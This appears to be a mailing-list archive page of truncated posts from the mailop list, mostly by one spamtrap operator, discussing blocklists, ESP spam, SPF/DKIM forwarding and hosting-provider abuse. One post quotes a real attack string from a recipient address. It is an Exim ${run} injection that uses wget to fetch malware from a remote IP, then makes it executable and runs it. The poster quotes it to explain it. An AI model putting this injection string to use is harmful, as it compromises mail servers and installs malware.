> I'm sure I've had a long explanation on here in the past year, but the
> short answer is if the message is not DKIM valid and you're forwarding, you
> should rewrite
> the MAIL FROM to a domain you own that will SPF authn the message... and
> try not to forward spam.
That's not how forwarding wo
> Might be convinced with this if it weren't for gmail being the source of
> ~40% of the spam we receive.
And that's after all of the botnets and so on have been blocked
through the use of DNSBLs, I suppose?
Mail subject lines seen in our test/dev spamtraps from Google outbounds
over the past two
> Does anyone know, why Amazon is not using their customer's domain as
> envelope sender?
It appears that customers can decide to do it.
> The Username part looks like a completely new random string on every
> email sent. Or is there a way to match one specific Amazon SES customer?
Parts of it m
> Maybe Brandon can weigh in on or off list, but is there a a way for
> spammers to simply relay out Gmail servers if they are Google Cloud?
$ host -t txt sredplus.com
sredplus.com descriptive text
"google-site-verification=gyoD4DWS9XSrAmz9s5Pc9OBLvvowksBJtB0Oi-DAlsQ"
sredplus.com descriptive tex
On Thu, Oct 26, 2023 at 10:07:30AM -0700, Michael Peddemors via mailop wrote:
> Not to be 'snide' Atro, but that part is pretty obvious..
You would have thought so - I would have thought so too. Which is
why I reacted that way to your asking about it.
> It was the technical details I was searchin
> They're a legit Google customer. What's there to marvel at?
https://developers.google.com/gmail/api/guides <- have a look.
--
Atro Tossavainen, Founder, Partner
Koli-Lõks OÜ (reg. no. 12815457, VAT ID EE101811635)
Tallinn, Estonia
tel. +372-5883-4269, https://www.koliloks.eu/
_
> 2a01:111:f403:2e1b::800 sent about 50 Spam Mails in October! Either to
> Spam-Taps or being reported by our customers.
50 in a month and you're worried? :-)
We get between 5000 to 9000 a day
yes, a day
from Microsoft outbounds to our spamtrap collection. About one thousand
of those are fake d
If you want any real action from Cloudflare, you have to jump through the
hoop of filling in the web based abuse form. It sucks but only you can
decide whether it's worth your time and effort.
--
Atro Tossavainen, Founder, Partner
Koli-Lõks OÜ (reg. no. 12815457, VAT ID EE101811635)
Tallinn, Esto
On Wed, Nov 22, 2023 at 04:25:36PM +0200, Otto J. Makela via mailop wrote:
> Can someone shed light on a Microsoft/Outlook block list? Our hobby server
> (on upcloud.com) seem to have been blocked for quite some time now.
I have no idea why, but given that upcloud.com spammed my company to
try to
On Thu, Dec 07, 2023 at 12:29:37AM +, Suresh Ramasubramanian via mailop
wrote:
> Free trial account on Microsoft 365 being relayed through Microsoft 365
> outbounds by a Hetzner IP
As Suresh says.
I've got a copy too. Nothing unusual in it, it definitely came through
M365 infrastructure. Fr
On Thu, Dec 07, 2023 at 12:44:58PM -0800, Randolf Richardson, Postmaster via
mailop wrote:
> I'm not familiar with Hertzner, but APNIC's WHOIS indicates a
> country code of ZZ for the sending IP address's netblock, which the
> ISO lists as "Unknown or unspecified country."
The descr: reve
> Inability to do external DNS lookups makes it impossible to monitor
> for presence on their list.
https://spam.fail/search?ip=127.0.0.2
--
Atro Tossavainen, Chairman of the Board
Infinite Mho Oy, Helsinki, Finland
tel. +358-44-5000 600, http://www.infinitemho.fi/
__
> Well, yeah, not really _impossible_, but I was referring to doing
> monitoring based on DNS lookups, as is normal for DNS BL.
Of course.
> Also, Domeneshop confirmed they operate spam.fail as internal list
OK. I tried tagging them on LinkedIn; it's an automatically generated
corporate page wit
> The residential address of the operator is a risk, because spamming is
> a criminal activity in most countries and spammers are sometimes
> organized like the mafia. They hate those lists and try to bring them
> down by all kinds of attacks. Not providing them more attack surface
> than necessary
On Tue, Dec 12, 2023 at 06:22:10PM -0600, Jarland Donnell via mailop wrote:
> Hey friends,
>
> Do me a favor and search your logs for this domain:
> SIBBERTLLC.onmicrosoft.com
Three hits yesterday.
> One customer received 1,347 attempted deliveries from it so far.
> Another, 823. Still counting,
On Wed, Dec 13, 2023 at 05:53:13PM -0500, John R Levine via mailop wrote:
> Phishing their own customers. I suppose in a karmic sense they
> deserve it.
>
> (No, CAUCE is not a customer.)
Neither are the resources where Koli-Lõks OÜ spamtraps received the same. :-)
--
Atro Tossavainen, Founde
> We're an email groups service, like Google Groups. Based on evidence
> provided by Spamhaus, it appears that some groups that migrated from Yahoo
> Groups when Y! Groups shut down contained some Spamhaus spamtrap addresses.
That might be the explanation for why some of your customers' lists
cont
> > https://www.talosintelligence.com/reputation_center/lookup?search=66.175.222.108
> >
> Thanks for this; I wasn't familiar with Talos Intelligence. Do they publish
> a blocklist?
Paying users only. Paying users include the Finnish government's
internal outsourcing center (Valtori) and Telia (ou
> Since most RBLs exchange data,
Source?
--
Atro Tossavainen, Chairman of the Board
Infinite Mho Oy, Helsinki, Finland
tel. +358-44-5000 600, http://www.infinitemho.fi/
___
mailop mailing list
mailop@mailop.org
https://list.mailop.org/listinfo/mailop
On Fri, Jan 19, 2024 at 03:31:19PM +0100, hg user wrote:
> Ok sorry not "most" but "some may"...
>
> My checkpoint rep said that they get their reputation lists from other
> companies... is it wrong ?
It's possible that Check Point are just an aggregator and don't actually
have first-hand data. B
On Wed, Jan 31, 2024 at 02:03:33PM +, Tarun Singh via mailop wrote:
> Hello Folks,
>
> Is there anyone from Protonmail on this distro? Can you please reach out to
> me offline?
Abuse and postmaster appear to work.
--
Atro Tossavainen, Founder, Partner
Koli-Lõks OÜ (reg. no. 12815457, VAT
> Hmm. How do I check that?
> Running nslookup defaults to my local resolver instance.
If it happens silently at the ISP's end, you can't check it - except
indirectly. What are the return codes that you get from your Spamhaus
Zen queries?
--
Atro Tossavainen, Chairman of the Board
Infinite Mho O
> Otherwise you need to stop using Spamhaus -- even if you sign-up,
> perhaps because of the query volume, you still must query them
> directly not via a public resolver.
This is not true.
One of the main points of DQS is that the DNS service you use no
longer matters. They don't need to block th
> ... but that does mean trusting 8.8.8.8 with your private secret.
From Spamhaus documentation:
"access to public mirrors requires the use of a non-public, non-shared DNS
resolver (therefore excluding services like Google Public DNS), while DQS can
use any DNS channel"
https://docs.spamhaus.c
> If the message is "your book is due in five days", it doesn't seem
> reasonable that legitimate addresses are going to belong to
> discontinued domains repurposed as spamtraps within that time
> period. Certainly not a lot of them.
We religiously observe the M3AAWG BCP for maintaining spamtraps
On Fri, Mar 15, 2024 at 08:11:42AM +, Alexandre Dangreau via mailop wrote:
> Hello,
>
> In fact, if you need a /64 IPv6 range you probably use the wrong service. For
> VPS and Public Cloud instances (PCI) the IPv6 range is shared with all the
> VM, so each VM (VPS or PCI) have one single IP
> What I found out is that the email content is searched for email
> addresses and if some hash of that email address matches, the email is
> rejected. It's the full email address. Only the domain part does not
> trigger the issue.
Yeah. To my knowledge, the idea of hash blocklists was first publi
> The SPF of molgen.mpg.de has `~all` (soft fail):
>
> $ dig txt molgen.mpg.de +short
> "v=spf1 ip4:141.14.0.0/16 ~all"
But this is irrelevant. The envelope-from of a forwarded message is
the original one - if you do not deliberately rewrite it - and in such
a case, the SPF that is evalua
> To give you a bit of context, we operate as an ESP, facilitating our
> customers in sending out newsletters.
If you want anybody to have an opinion on this stuff why don't you
identify yourself, the domain names and the IPs involved.
--
Atro Tossavainen, Founder, Partner
Koli-Lõks OÜ (reg. no
> Other than that, I'm with you, it is a fraction of a percent of signed
> mail, not common at all.
I'm with Dr Levine; I just looked at all the stuff our spamtrap system
has received in May so far (n~=8M). The exact number I came up with is
0.6%. Also, the percentage of signed mail out of all mai
> PS I’m definitely on the hate side today, having discovered that to actually
> _use_ MS’s implementation of DKIM, I may well have to shell out a 6 figure
> GBP sum. If anyone can demonstrate to me that outbound DKIM signing in
> Exchange Online Protection is possible, and working, without any
On Thu, Jun 20, 2024 at 05:33:47PM +0800, Jeff Peng via mailop wrote:
> BTW, What’s the good way to block messages based on languages?
Analyzing messages for language content first, then being able to
decide based on results. There are multiple libraries for multiple
programming languages that wil
> I agree that overall, the new TLD program has been a failure and makes
> a mockery of ICANN's claim to operate as a public charity in the
> interests of the public.
The second round is just around the corner. I guess you're thrilled.
I am.
--
Atro Tossavainen, Founder, Partner
Koli-Lõks OÜ (re
> routed through a separate gateway. Unfortunately, this gateway's IP
> address is heavily compromised and listed on the Spamhaus blacklist.
On specific request from GMX.
> Isn't GMX's approach to spam prevention for non-European regions
> overly simplistic and potentially harmful to legitimate u
On Thu, Jul 18, 2024 at 08:36:09PM +0800, Jeff Pang via mailop wrote:
> Can I setup mailserver to accept messages via sdl/tls only from
> other MTA? How to disable peer MTA send me plaintext mail?
Qiyong, is that you?
--
Atro Tossavainen, Chairman of the Board
Infinite Mho Oy, Helsinki, Finland
> 550 5.7.1 Connections not accepted from servers without a valid sender
> domain.flph840 Fix reverse DNS for 66.171.0.45
$ host 66.171.0.45
45.0.171.66.in-addr.arpa domain name pointer outbound.eastex.net.
45.0.171.66.in-addr.arpa domain name pointer eastex.net.
It should have exactly one.
http
> There's life at Google. Just pay for GSuite.
Is this the generic advice that all Android device users should take
in order to ensure they will be able to continue to use the Google
account which is essentially mandatory to have in order to use said
device? If so, how come it is not suggested wh
> The flaw for me is that TOTP involves using phone apps I don't know
> the provenance of,
https://github.com/freeotp
is much lighterweight than Microsoft or Google Authenticator anyway.
> that back up the data in a format I don't know
> to my "Google Drive", which is the most protected place I'
On Tue, Mar 03, 2020 at 12:45:52PM -0500, Matt V via mailop wrote:
> Bluehornet is now Mapp digital, Lots of legitimate companies use
> their services to send email.
Seconded.
There's a lot of stuff that shouldn't be there too. I mean, I don't mind
Lindsey Graham sending his begging letters to my
On Wed, Mar 18, 2020 at 07:48:05AM -0700, Michael Peddemors via mailop wrote:
> While you are at it, ask gmx if they can stop leaking obvious Mitre
> attack emails, via their webmail(s) ;)
If I remember correctly, they have two sets of outbounds, the other
one of which delivers the known bad mail.
On Thu, Mar 19, 2020 at 02:40:23PM -0400, John Levine via mailop wrote:
> One of my users reported that I was rejecting mail from Yahoo, and I found it
> was because at least one of Yahoo's outbound addresses 74.6.128.32 is listed
> at bl.mailspike.net.
If you google "mailspike", the first hit has
> I see they're also blocking Gofundme and Constant Contact. Again, not
> pristine but vast numbers of false positives.
>
> Nothing personal but I won't be using their BL again any time soon.
Not my circus, not my monkeys...
Pozdrawiam,
--
Atro Tossavainen, Founder, Partner
Koli-Lõks OÜ (reg.
On Sun, Mar 22, 2020 at 02:11:45PM +1000, Ted Cooper via mailop wrote:
> Has anyone run into "Abusix" /potentially/ compromised account
> notification emails before?
Not before, but now that you say, yes.
I have a few dozen samples in spamtraps from Friday Mar 20, never before.
They're both in re
Steve,
> >I am not impressed.
>
> Sorry about that Atro.
Having witnessed what I have today, I have to say I think your concept
is inherently flawed.
Also, my handful-of-dozen spams of this type are apparently a drop in
the ocean when compared to some of the more serious spamtrappers who
claim
On Tue, Mar 24, 2020 at 10:58:14AM -0500, Al Iverson via mailop wrote:
> I'm not understanding how this intersects with spamtraps. What does
> this alert actually notify a network owner of?
> Failed SMTP auth attempt from my IP space?
> Or a failed SMTP auth attempt from someplace else TO my IP spa
> We're reporting usernames and partial password hashes to the domain
> owner (and Abuse Contact for the MX IPs) of accounts that we've seen
> authenticating to one of our more exotic trap types which sees stuff
> that is different to the regular AUTH junk normally observed on a
> regular spam trap
> Uh, well, aren't you curious about how bots harvest that data?
I am indeed not.
Using leaked credentials from Adobe, Dropbox, LinkedIn, or any other
widely available leak that has email addresses and passwords is quite
the sufficient explanation for me. There may be others, but this is
large en
> Once-only invitations to opt-in sound cool.
Not to me - we tell marketers they can't ask permission by spamming,
so I don't think anybody else should get a free pass either.
IT. DOES. NOT. SCALE. Nobody gives a flying flamingo about who the
sender is or what the purpose of the messaging is. IT.
A friend received a mail with an RCPT TO like this:
X-Original-To:
root+${run{x2Fbinx2Fsht-ctx22wgetx2045.148.10.84x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@domain.example
Now it's easy enough for me to see what the idea was - to get a piece of
malware from 45.148.10.84, make it executa
> When you have a business that can cause damage to others (because your own
> customers), you have also contracts and AUPs with your customers. If you need
> to invest in more automation, staff, or both, to make sure that your business
> goes well and doesn't attract "bad customers", because yo
> Why would a DNS server be querying our mirrors?
Have you ever seen anyone instruct anyone else to use 8.8.8.8 or
8.8.4.4 as the DNS server configured on their platform?
I might even go so far as to surmise that would be a default
configuration in the VPSes of more than one provider.
--
Atro T
On Thu, Apr 30, 2020 at 09:18:55PM -0500, Al Iverson via mailop wrote:
> Try https://postmaster.mail.com/en/contact
KAM reported having tried that in the original post.
> In my experience, they do respond.
KAM's experience differed.
On the other hand, they're also represented here in person and
On Mon, May 04, 2020 at 08:49:32PM -0600, Will Boyd via mailop wrote:
> Hi Kyle,
>
> I've located those tickets. It looks like a colleague did reply on
> Wednesday to 4218173 and the reply went to Angelo. I'm not on our abuse
> team but will ping them with both ticket numbers to follow up.
Thanks
On Tue, May 05, 2020 at 02:15:07PM +, Andy Smith via mailop wrote:
> Hello,
>
> On Tue, May 05, 2020 at 06:00:44AM +0300, Atro Tossavainen via mailop wrote:
> > Any chance SendGrid might amend its ticket system so that there would
> > be autoreplies when tickets are crea
On Tue, May 05, 2020 at 07:48:12AM -0700, Michael Peddemors via mailop wrote:
> Since on the topic of SendGrid..
http://mainsleaze.spambouncer.org/2019-11-to-2020-04-in-spamtraps-esps/
The trends for Salesforce and SendGrid are remarkably upwards...
--
Atro Tossavainen, Chairman of the Board
In
> SURBL entered 130.248.* in its blacklist a few time ago.
As far as I know, the SURBL lists URLs - domain names - not IPs.
"SURBLs contain web sites that appear in unsolicited messages. They can be used
with programs that can check message body web sites against SURBLs, such as
SpamAssassin 3
On Mon, May 11, 2020 at 02:07:10PM +0200, Hetzner Blacklist via mailop wrote:
> Just a quick heads-up: Webiron appears to be having issues. Their
> website is down, and their blacklists (combined in all.rbl.webiron.net)
> are listing the world.
Thanks Bastiaan!
The domain was last updated Apr 22.
> I don't see any drop in volumes here. I just spent 10 minutes
> looking at anything hitting traps today from Sendgrid ASN and soon
> found plenty of concern:
I concur with Steve.
http://www.atro.fi/sendgrid.png
Y axis is linear, thin line is trendline.
--
Atro Tossavainen, Founder, Partner
Hey Ray,
> I checked again this morning and its 'back on track' here also now.
>
> I saw a (big) drop here during the day but it has cought up.
Having a bit of longer-term perspective is good.
Having said that, my business partner remarked that "we are also dealing
with a situation where compan
On Thu, May 21, 2020 at 09:29:02AM -0400, Chris via mailop wrote:
> Atro, what was Y axis? Individual emails? 10's? 100's?
More than that. Still only a drop in the ocean when it comes to an ESP
that sends billions a day, of course. We are no Microsoft or Google.
> And you just seemed to say th
On Tue, Jun 02, 2020 at 08:22:40PM +, Michael Wise via mailop wrote:
> It would need to be a standard... a SINGLE standard.
>
> Like the FTC "Do Not Call" list.
What Michael said... And it would be a colossally bad idea.
Anybody think it wouldn't leak and be used specifically to spam some
mo
> In the end, if mailchimp actually DID use the sender's email in the
> MAIL FROM, it might make it easier.. If they did had a way to see
> that this was an invite..
Practically all ESPs use VERP.
https://en.wikipedia.org/wiki/Variable_envelope_return_path
It makes sense for them in so many ways
> Do we hear a ESP actually recommending that all their email gets
> sent to a junk folder .. hehehe..
Way back when, I used to have Procmail rules that would simply forward
anything that was sent from Constant Contact back to their abuse@. They
would not show up in a mailbox of mine, either.
Don
> I've put a subject access request into mailchimp, so I'll see what
> comes back. I guess depends whether mailchimp think they are
> governed by GDPR or not.
They are of course governed by the GDPR... in the role of the data
*processor*. As such, upon receiving such a request they will have to
r
> For me, it was noticing how, despite getting 550'd for an extended period of
> time, Mailchimp just keeps hammering away at the address, never dropping it
> from the list. That, too, is not the behaviour of a responsible ESP.
As I keep saying, we would not have a business at all if any ESPs act
out of timeout, which would result in our not
having a business at all. Not the case.
>
> On Wed, Jun 3, 2020, 11:30 PM Atro Tossavainen via mailop
> wrote:
>
> > > For me, it was noticing how, despite getting 550'd for an extended
> > period of
> > &
Luke, thanks for the reply,
> I appreciate the added perspective here. It sounded like you were
> suggesting that ESPs do not suppress invalid email addresses.
The evidence suggests this is the case.
> But it sounds like you are aware that ESPs do suppress invalid email
> addresses, but you beli
> I recommend you try working with them vs calling them out as being
> bad actors - These teams (especially the Mailchimp team) works very
> hard, harder than most hosting companies i would imagine, to stop
> abusive behaviour from their networks sending billions of emails
> around the world. From
> problems as they solve. You're a large ESP so I'd expect more than one
> UCEProtect listing... If you're policing your customer base, and customer
> campaigns aren't using junk lists, there's not much else you can do.
I only have limited visibility to *everything* that Webpower sends, of
course,
> We handle an email forwarder. Recently, we have been having more and
> more issues with people reporting forwarded emails as spam, that end up
> (probably) deteriorating the reputation of our email servers.
You could ask the good folks at iki.fi for tips. They've only been doing
this for 25 year
On Wed, Jul 15, 2020 at 04:49:49PM -0400, Oreva Akpolo via mailop wrote:
> We've been experiencing connection issues sending to ono.com. Specifically,
> all mails to that domain are deferring with the following response:
>
> connect to mx.ono.com[62.42.230.22]:25: Connection timed out
Hey Oreva,
On Mon, Jul 20, 2020 at 04:57:05PM +0200, Heiko Schlittermann via mailop wrote:
> Hi,
>
> I think, that queries for theses (A, TXT) records can be used to
> find if the blacklist is working:
>
> 2.0.0.127..zen.dqs.spamhaus.net
> dbltest.com..dbl.dqs.spamhaus.net
>
> Is anybody aware of
The SendGrid account sending these yesterday is 13999362.
Method: get all SendGrid mail from yesterday and today, restrict to
anything that says "quota full" in the subject, look at accounts sending.
Sample size is measured in the dozens, across about ten recipient domains.
They were all sent by
> Does the c581 part also belong to the account id?
I think it does.
> I might consider trying to extract this on my spamtrap and collect them
> to see if there are accounts that keep sending phishing emails for long
> times.
Top senders in Koli-Lõks traps yesterday (n>7000):
8512936 (5%) - mul
> and this also no guarantee for no spam. Recently I got some spam for
> "dates18.com" sent via Casual Networks B.V (on the CSA whitelist) in
> which even the "Imprint"-URLs lead to "Congratulations, you
> confirmed your mailaddress".
Whitelisted senders send plenty of spam.
The requirements also
Hey Marcel,
> That is incorrect. There are exceptions to account for these situations
> where mail sending entities are owned by larger, non-mail sending entities.
I will happily be set straight on this. Reference please?
I am going by
https://certified-senders.org/wp-content/uploads/2017/07/CS
> ... people still DO that? Sorry.
Yes, people do still do that, unless you count yours truly as "not
people" =:->=
It's hard to have HTML/JavaScript rendering related security problems
when you don't. It's nice to run the mail client on a server that you
can ssh to from anything, and it's really
On Fri, Oct 09, 2020 at 03:39:46AM +, Michael Wise via mailop wrote:
>
> I tried doing a WHOIS lookup, but it just referred me here, which doesn't
> have it:
>
> https://www.as14061.net
>
> So far, I've got:
>
> 157.230/16
> 159.89.16
> 159.203/16
> 161.35/16
> 165.227/16
>
Why does Google bounce after accepting a message? At Google's scale,
the potential to become the world's biggest spammer simply through
backscatter is enormous.
** Message blocked **
Your message to [an address on a Google service] has been blocked. See
technical details below for more inform
> * bounce it back to the sender which you assume is valid (since you
> did some due diligence on the ingress server to reject fakes). That way,
> you don't drop the message, and you don't bother your customer. Let the
> sender sort it out if they actually exist.
And this is where they mess up b
> What do you prefer they do with that email if they determined it's
> malicious only after they accepted it?
>
> A: Dropping it: Folks will complain about them "behaving like Microsoft"
>
> B: Send it to the user (even spam folder): Users are not necessarily smart,
> they interact with phish mai
On Fri, Oct 30, 2020 at 11:23:04AM -0700, Brandon Long via mailop wrote:
> The answer is, we try very hard to prevent backscatter and reject messages
> at smtp time instead of bouncing later.
>
> This is not always possible, however.
Thank you for the extensive description of what you do. Whateve
Hey Eric,
> bounces+7456750-0096-
https://www.spamhaus.org/sbl/listings/sendgrid.com shows SBL500803 and
SBL500804 for this customer, so it's clearly been interesting and high-
volume enough for somebody else to notice too.
> bounces+28313-9769-
This is Bullhornmail.com, a recruiting company. I
On Thu, Nov 12, 2020 at 11:08:28PM +0200, Mary via mailop wrote:
>
> Hello,
>
> Anyone knows how to get in touch with the owners of ASN 46664?
https://www.spamhaus.org/sbl/query/SBL461359 suggests you may not wish to.
If Spamhaus is reading this, I'd say this should be on DROP if it isn't.
If
> Is it generally best practice to also scan all outgoing e-mail on a
> shared e-mail cluster for spamminess?
If you're going to prevent some part of the mail stream from leaving your
infrastructure, then possibly, but IMHO marking something as spam and
still sending it on is adding insult to inju
On Tue, Mar 02, 2021 at 10:15:51AM +, André Peters via mailop wrote:
> Wow. Just wow.
Seconded.
I've reached out to the OP on a LinkedIn DM to tell them this has happened.
>
>
> -- Originalnachricht --
> Von: "Vittorio Bertola via mailop"
> An: "mailop@mailop.org"
> Gesendet: 0
On Wed, Mar 10, 2021 at 08:36:15AM +, Hans-Martin Mosner via mailop wrote:
> Hello,
>
> does anyone have a pointer to technical details about the recently surfaced
> Exchange vulnerabilities? I would specifically be interested whether the
> exploit(s) depends on the server being exposed to t
> How about senders using @t-online.de as from address?
>
> Can the receiving side implement the same strict alignment rules for
> e-mails with an @t-online.de from address any time soon?
No SPF, no DMARC :-)
(Which you of course knew)
--
Atro Tossavainen, Chairman of the Board
Infinite Mho Oy
Al Iverson wrote:
> Convince Spamhaus they should be SBL'd, blog about it, sue them, whatever,
> but keep in mind that the tiny number of individual reports to Spamcop
> doesn't really do much by itself. Keep sending reports there, as if they
> get enough reports, it'll cause listings on the SCBL
Over yesterday and today, the following X-Entity-IDs have sent us
mail that somehow related to .zoom.us:
X-Entity-ID: ApJYVCoyRSXXkzbu3h3uow==
X-Entity-ID: lURbVkUlQbFl9F6ROPqNUw==
X-Entity-ID: mDhfxq9OikvIkQieTwdfQA==
X-Entity-ID: 7mxhBNMkQ9yfwz0A5+NG7Q==
These correspond
On Wed, Jul 07, 2021 at 04:08:42PM -0700, Carl Byington via mailop wrote:
>
> On Tue, 2021-07-06 at 23:59 +0300, Atro Tossavainen via mailop wrote:
> > X-Entity-ID: 7mxhBNMkQ9yfwz0A5+NG7Q==
>
> > Return-Path:
> That one has been trying to send spam here for at lea
On Tue, Jul 20, 2021 at 01:09:16PM -0700, Len Shneyder via mailop wrote:
> Hi Brielle,
>
> Can you send me a full unredacted header and I'll take a look at what's
> going on. I'm sorry you didn't get a response earlier to this.
I know I'm not Brielle but I'd like to confirm that Zoom is sending q
On Wed, Aug 04, 2021 at 11:16:15AM -0600, Brielle via mailop wrote:
> Like the title asks?
>
> Still seeing it daily in my logs hitting the system filters... Same
> source accounts, same general bodies with no unsubscribes, sent
> through Zoom's accounts at Sendgrid...
Confirmed, vehemently.
>
> If this was an intentional listing by SpamHaus, I applaud them doing
> a 'shot over the bow'..
XBL listings should be all automated? https://www.spamhaus.org/xbl/
However, there is the fact that
https://www.spamhaus.org/sbl/listings/google.com
has, at the moment, 342 intentional (manually cre
On Sun, Oct 17, 2021 at 01:04:53PM -0700, Dan Mahoney (Gushi) via mailop wrote:
> All,
>
> For years now I've been the target of a number of resumes from
> UAE-based google-groups.
Have a look at these two things.
https://www.spamhaus.org/rokso/spammer/SPM1559/syedsmarketing
https://www.sp
On Thu, Nov 25, 2021 at 12:33:54PM +0200, Mary via mailop wrote:
> Hello everyone,
>
> I noticed today that spamhaus.org is blocking large net blocks of IPv6
> (2a01:7e01) owned by Linode. Pretty much all my clients hosted at Linode are
> being blocked en mass (for IPv6 only).
https://www.spamh
> I first noticed that all outgoing emails that are using IPv6
> > > addresses, are being rejected by anyone using zen.spamhaus.org
> > >
> > > I then tried a bunch of my addresses and they all tested as listed in
> > > https://check.spamhaus.org/
> > &
On Thu, Nov 25, 2021 at 04:22:05PM +0200, Mary via mailop wrote:
>
> But that is not a real solution is it?
It is because it's the right thing to do in the first place.
> Maybe linode and spamhaus can come up with a better solution between them?
I would not expect any changes on the policy of t
> Sure. Linode could decide to stop operating a public nuisance and
> police their sewer more effectively. Historically, Spamhaus has a
> long record of delisting network operators who reform their
> abuse-handling.
This isn't even about that. This is only about Linode cramming more
than one custo
> Would it be possible for the two sides (blocklists and a cloud/hosting
> providers) to come together and have some kind of automated notification?
Objection, requires an interest in collaboration from hosting providers.
--
Atro Tossavainen, Chairman of the Board
Infinite Mho Oy, Helsinki, Fin
1 - 100 of 199 matches
Mail list logo
